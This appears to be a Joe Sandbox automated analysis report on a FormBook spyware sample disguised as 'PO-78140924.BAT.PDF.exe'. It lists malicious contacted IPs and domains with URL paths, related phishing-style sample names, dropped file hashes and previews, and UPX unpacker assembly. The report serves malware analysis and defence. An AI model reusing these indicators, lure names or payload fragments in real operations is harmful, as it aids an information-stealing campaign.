                                              https://www.gandi.net/en/domainYKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3Fvf5pwn%3DnzYKkstfciYBQ.exe, 00000003.00000002.3899395542.00000000050E6000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005D26000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.b5x7vk.agencyYKkstfciYBQ.exe, 00000003.00000002.3900775999.00000000063C2000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              67.223.117.189
                                              		www.heldhold.xyzUnited States
                                              		15189VIMRO-AS15189UStrue
                                              172.96.187.60
                                              		dalong.siteCanada
                                              		32475SINGLEHOP-LLCUStrue
                                              103.248.137.209
                                              		azkwupgf.as66588.comHong Kong
                                              		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue
                                              172.67.165.25
                                              		www.b5x7vk.agencyUnited States
                                              		13335CLOUDFLARENETUStrue
                                              217.70.184.50
                                              		webredir.vip.gandi.netFrance
                                              		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                              81.88.63.46
                                              		www.2bhp.comItaly
                                              		39729REGISTER-ASITtrue
                                              3.33.130.190
                                              		linkwave.cloudUnited States
                                              		8987AMAZONEXPANSIONGBtrue
                                              85.153.138.113
                                              		www.mfgarage.netTurkey
                                              		12946TELECABLESpainEStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1519457
                                              Start date and time:2024-09-26 15:21:08 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 19s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:PO-78140924.BAT.PDF.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/4@11/8
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 82%
                                              • Number of executed functions: 92
                                              • Number of non-executed functions: 330
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: PO-78140924.BAT.PDF.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              09:22:48API Interceptor7311144x Sleep call for process: mstsc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              67.223.117.189rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • www.heldhold.xyz/fava/
                                              Enquiry.exeGet hashmaliciousFormBookBrowse
                                              • www.uburn.xyz/iqqs/
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • www.uburn.xyz/unks/
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • www.uburn.xyz/unks/
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • www.heldhold.xyz/fava/
                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                              • www.techstone.top/d5fo/
                                              Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                                              • www.nodedev.top/wnsq/
                                              ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                                              • www.akissdove.xyz/8ntn/
                                              OrderPI.exeGet hashmaliciousFormBookBrowse
                                              • www.helidove.xyz/no40/
                                              PRE-ALERT HTHC22031529.exeGet hashmaliciousFormBookBrowse
                                              • www.nodedev.top/wnsq/
                                              172.96.187.60rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • www.dalong.site/v2c3/
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • www.dalong.site/v2c3/
                                              xU0wdBC6XWRZ6UY.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==
                                              103.248.137.209rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • www.63582.photo/5o7d/
                                              172.67.165.25Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                                              • www.b5x7vk.agency/3rsv/
                                              217.70.184.50NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                              • www.turbonotes.app/yvck/
                                              CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • www.ultraleap.net/8pln/
                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.offkase.org/vkr8/
                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • www.ultraleap.net/hwgh/
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/
                                              PO098765678.exeGet hashmaliciousFormBookBrowse
                                              • www.ultraleap.net/4qqr/
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • www.languagemodel.pro/nxfn/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.heldhold.xyzrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              webredir.vip.gandi.netNVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO098765678.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              www.2bhp.comrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 81.88.63.46
                                              azkwupgf.as66588.comRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 103.248.137.209
                                              inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              www.b5x7vk.agencyrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.11.31
                                              Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.165.25
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.11.31

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SINGLEHOP-LLCUSRFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 67.212.175.162
                                              https://xtrafree.x10.mx/Get hashmaliciousUnknownBrowse
                                              • 198.91.81.14
                                              http://dev-265334124785.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://dev-gdtf.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/onu2r0/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/v99361/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 172.96.187.60
                                              http://www.rb.gy/yfdl7y/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/h66x7g/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              http://www.rb.gy/6ucw3c/Get hashmaliciousUnknownBrowse
                                              • 198.143.164.252
                                              CLOUDFLARENETUSNVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.181.150
                                              https://www.google.co.uk/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.us.m.mimecastprotect.com/s/n0rICERpMNsxN8vRCNfXC76qeb?domain=sharedocx.z13.web.core.windows.netGet hashmaliciousUnknownBrowse
                                              • 104.21.67.246
                                              TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                              • 104.21.67.246
                                              purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                              • 172.66.0.235
                                              https://www.google.to/url?url=https://bxaxlsoggszcwwbz&nzc=vvjpqcc&suvkdk=cmz&kwdec=vutety&cbb=sslsceg&pagnn=fuhmpw&dkqf=mwwhastk&ffmvozjupo=yqbyougxxo&q=amp/gm5bqhj.g%C2%ADb%C2%ADe%C2%ADym%C2%ADw%C2%ADc%C2%ADg%C2%ADv%C2%ADk%C2%ADb%C2%ADd%C2%ADevll.com%E2%80%8B/cbvogermm&clnw=xokmakg&dhxrdhh=zgwr&tievm=savxww&gfpizxn=fnvGet hashmaliciousHTMLPhisherBrowse
                                              • 104.21.235.70
                                              http://erptanacsadas.hu.pages.services/secure-business-document/?ts=1726767567620Get hashmaliciousHtmlDropperBrowse
                                              • 188.114.96.3
                                              https://forms.office.com/e/jUjy5zj0tMGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              You have a held messages (dawie@ddebeer.co.za).msgGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              DNC-ASDimensionNetworkCommunicationLimitedHKRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 103.248.137.209
                                              inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.174
                                              NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.40.175
                                              Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 147.92.36.247
                                              http://oveman-austral.com/Get hashmaliciousUnknownBrowse
                                              • 147.92.44.231
                                              PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 147.92.35.81
                                              a82WdwCQnQOQf4b.exeGet hashmaliciousFormBookBrowse
                                              • 147.92.35.81
                                              VIMRO-AS15189USrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              Enquiry.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.118.13
                                              LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                              • 67.223.117.189
                                              H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 67.223.118.13
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                              • 67.223.119.7
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                                              • 67.223.119.7

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\2348427

                                              Download File
                                              Process:C:\Windows\SysWOW64\mstsc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.121297215059106
                                              Encrypted:false
                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\aut31CC.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):50462
                                              Entropy (8bit):7.805523402671471
                                              Encrypted:false
                                              SSDEEP:1536:f7wfc8mmeqwfeVJ2Nn2ksyh3bu54d7SqE474:Dw6meqwf8C2ZyZyk7SqEW4
                                              MD5:7768F7B04100EAF3C76E855072EC1E82
                                              SHA1:B70FF99A2EFEDE8186A1C494254E9082AB0E43FD
                                              SHA-256:1DD577EFA154150DDDCF6B3F7735676736B15963526E6DBB420029C539ADEC5D
                                              SHA-512:1BBD4BD0C2C64091D89D4B0EF0483776ECD6B3CC590F2B4FD571B5338BB926DE858E409676B23674A074BA48ED585D72667A3868EC7B8F1374EE885D7C7555E4
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06.....I.....kV.T.TK,..+.].2.-..F..wI..e=.Mf....ae..&.Y..oH.R......r.Nf....a2.P&....m9.L'5..k>.R....sE.Q....aU.J&...a=.N....s@.Z.i.Fm`.J,39..ew.Z...fay.Xf.).zm=.Y'4).>k2.N.$.|.e6.Yf...BaQ.R..i..m2.L....2i6...[...4..f...as..&....Q*.S&...^si.U,.9.Z.$.T.2...@..,....QD.Pf.Y..qg......qe..lT..gc...#....Q.I&...mE._'3.kQ...+.ns(..U)......)..l..6..s.|..4..)3.t..b..hs)..a0..|.i..a|.Nf....qB..f.y..s6.I,R..mM.U&.P..0.L%S...6.N'....5..ksj..e9...9..w0....Y..as.Vf.Y..sQ.Yl...q&.U.2..z.`.S.i.l...H...q(..f.)..sW..v..6.Q&...d.p..'.[..c.X...$..e..,@......L%.i...q..'.+%viU._l.;4..h.^l..5^.h....a<.2..?..ms.S'....sm.......X.Q...5..Q.UlV...mE.M......0..)3.L..6..&s....5.M%..M.Uf.Y.6i..[f....4.c....9...(..&sj..M8.Nk....}4..i.....].Jl.5j.n....l..._....a:.^.Q...O9.Mn3I]..f.Y...E.. .X...<..e..\..+..0..-.kD.]8..j....s4..fVju..f.Y.Vi...b..i....a1.I........L.....@..'SY$..f.Y......X....9.".r.H./.L.0.L$.i8..=..'4.vk(.O.T.}....W....Zq$.L.s...Z..Y..i..mX.L)....U5.Mn.0...x.X

                                              C:\Users\user\AppData\Local\Temp\definitization

                                              Download File
                                              Process:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              File Type:ASCII text, with very long lines (57348), with no line terminators
                                              Category:dropped
                                              Size (bytes):57348
                                              Entropy (8bit):5.7440570198461565
                                              Encrypted:false
                                              SSDEEP:1536:3npJpjLot+QAJVY69Jgl/pngvMhe28yJsSIRVQ5:Zzjsd6YnYMj8pfQ5
                                              MD5:B1A3D2BCD7A9848331D880A404EA8CCE
                                              SHA1:7F6969BE160DDD7429BC72413632386498DC5BE7
                                              SHA-256:05E8D8794663862FF93096094430B47E4959EF7B557A4DDC82089AFC5C2D5A07
                                              SHA-512:F9F9F9E6E0096FC99B8EE0D32E744A0076217E4223B94A2D14E601CFC195FD4210D6B48B73E9798FD9DE0461446E8BA88D4EC01C87136E5AEBCEFED4947151F5
                                              Malicious:false
                                              Reputation:low
                                              Preview:0&x`5!5V8RbDe.c+8w1+eDcFcfct0{2=050{0.0e5x6u517HbK8`6dbr090?0:020@086}69809\4%5>8K4-b39E6G5@0t0U0(0=080=6;6M8e9@4kdv8Q6`b(a37g2w0k0]0Y0y0a0R6^6=8d9B5O528;8Rbo826"e40k0P0Q0K0F0@62628_9L465R8ua3b49!6)5/0s0{060c0P0*6L6}8W9i4TdS8Vc$bSa-6%ct0#0f0C0a0D0A65638g9g5o5p8ee1bO8)3c3`0]0v0D0Q0$0}6u6E8|9>4'5Q960Rb[9(3b2R0`0`0K0M0-0`676C8O9e4-dI9N2ob=aC24e00Z0=0f0&0|09616-8B995g5%964$b!8-6M4T0E0v0^0L0*0x6M6P8>914d5!9[6Qb29g6_c20;0z020u0r0s6Y6%8z9Q4ed-9k8&bVa*6^c`0N050m0\0{0#6>6g8(9U5b5l9Wa*3n3cc60D6@6Y8d934<5u9^c|b%9d6sek0b050.020Z0/6?6}8q9,8Bd]4U4}f3f1fhfyf`fWbha.7.4!0<0b050_0?0~6s6L8M9>9m5'416;fXfFf/fnfQfUbj8<6E440b030j0}0I0I6i6/839S8q5~4(8if*fjf!f5f-fEbM9F6JcW0a0#0B0{0o036V6&8X9]8Ad>4oaMfQf7f]f)fIfZbna26Yc[0c0C020?0g0:6x6P8^9'9,5q4+c]fTfvfjfhfTf@b-8g2fe+090(0:0W070l6h6.8=9U8a5943e2fNfef8fbf0fJb_9H6E40010'0$030e0s6268889]8id:5$0xf(f.fTfgf7f8bVaS6Hcr0"0B0i0S0h0$6'6L8=9(9M5]5(2<f3f/fBf8f_f,bV8$63c:0e0-0W0f0V0&6X6C8L988*5P5v4}f$fxfafkf*fR3L3Wca9[6s658~9283dv5Q6Ffhf-fYf?fBfeb1aJ7I5u0f0Y0W0m0J0{6=6|8{9i

                                              C:\Users\user\AppData\Local\Temp\proximobuccal

                                              Download File
                                              Process:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):287744
                                              Entropy (8bit):7.994345059857177
                                              Encrypted:true
                                              SSDEEP:6144:CUxp9CNCkox3ARd/Ks3/fd7UnxqOLC3eKNjCdOxHu05puYPYdyc:Ci9Cqx3WRd7UrC/Nu4xHf4
                                              MD5:FDDBC447FB03CC8DAC81845B7B0D73C6
                                              SHA1:B93CD7384925ECD13A0D451D893517672BEA1594
                                              SHA-256:ED3F219497FCBBC69987E31549D460E1FF4A6114391A12A7090BB0CACB52A0F2
                                              SHA-512:E5A0DCE53ADB335ECA2B172EB39A591AE20AFE449BBFF8ABE8321215BB25CEE2DA84D9BA042E68E0EC67FFEFCA279A85798ACBA4F2958DBABDD060D22402E34F
                                              Malicious:false
                                              Preview:...g.Q7QM...].....DZ...y4Y...0T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ.ZQ7_R.<0.9.w.B..x.]3".!?.UB5].51-&+-qW?qE$#a[^ttz.p.' <.8W[.QMA20T0LWY.u$>..:6.l-&.*..l0$.^...f1P.W..hPR..*+,d1R.Q7QMA20T`pVP.IEY...7QMA20T0.VRBCERQ5.U7QMA20T05.CCHDIQ5Z!3QMAr0T 5VPAHD_Q5ZQ7QMG20T05VPC8@YQ7ZQ7QMA00..5V@CHTYQ5ZA7Q]A20T05FPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T0."5;<DYQ..U7Q]A20.45V@CHDYQ5ZQ7QMA20t056PCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20T05VPCHDYQ5ZQ7QMA20

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                              Entropy (8bit):7.975429925599898
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.39%
                                              • UPX compressed Win32 Executable (30571/9) 0.30%
                                              • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              File name:PO-78140924.BAT.PDF.exe
                                              File size:1'085'440 bytes
                                              MD5:0c3d90f3a7607383e1e4a5da779b23f2
                                              SHA1:bf3452b178fe50a53d94498cd2efc777c993954b
                                              SHA256:4b3d9e2b4d5af94fe3953942fe920f42c3928a7c4c9d5ccd841bd1fac367690e
                                              SHA512:0227db6226986894591497b2ea75411dd198a06a6370c2902e6901813088b6fe1e279e8f64233663daf89660a8eaedf3ef95ba4d2a910dacaff54fd6c1dbbc9f
                                              SSDEEP:24576:r4GHnhIzOaWz4cTAKcvr2Nt0GUirujvK61BRM7KU:Ushdau/Srw/FKSar
                                              TLSH:2B3523E9E081D467E1B927B088764C991E247836ED947F0BD782E24EFD18347C637A2D
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                              File Icon

                                              Icon Hash:aaf3e3e3938382a0

                                              Static PE Info

                                              General

                                              Entrypoint:0x58aac0
                                              Entrypoint Section:UPX1
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66F1251F [Mon Sep 23 08:21:51 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:fc6683d30d9f25244a50fd5357825e79

                                              Entrypoint Preview

                                              Instruction
                                              pushad
                                              mov esi, 00535000h
                                              lea edi, dword ptr [esi-00134000h]
                                              push edi
                                              jmp 00007F6FD8E075ADh
                                              nop
                                              mov al, byte ptr [esi]
                                              inc esi
                                              mov byte ptr [edi], al
                                              inc edi
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E0758Fh
                                              mov eax, 00000001h
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc eax, eax
                                              add ebx, ebx
                                              jnc 00007F6FD8E075ADh
                                              jne 00007F6FD8E075CAh
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E075C1h
                                              dec eax
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc eax, eax
                                              jmp 00007F6FD8E07576h
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc ecx, ecx
                                              jmp 00007F6FD8E075F4h
                                              xor ecx, ecx
                                              sub eax, 03h
                                              jc 00007F6FD8E075B3h
                                              shl eax, 08h
                                              mov al, byte ptr [esi]
                                              inc esi
                                              xor eax, FFFFFFFFh
                                              je 00007F6FD8E07617h
                                              sar eax, 1
                                              mov ebp, eax
                                              jmp 00007F6FD8E075ADh
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E0756Eh
                                              inc ecx
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
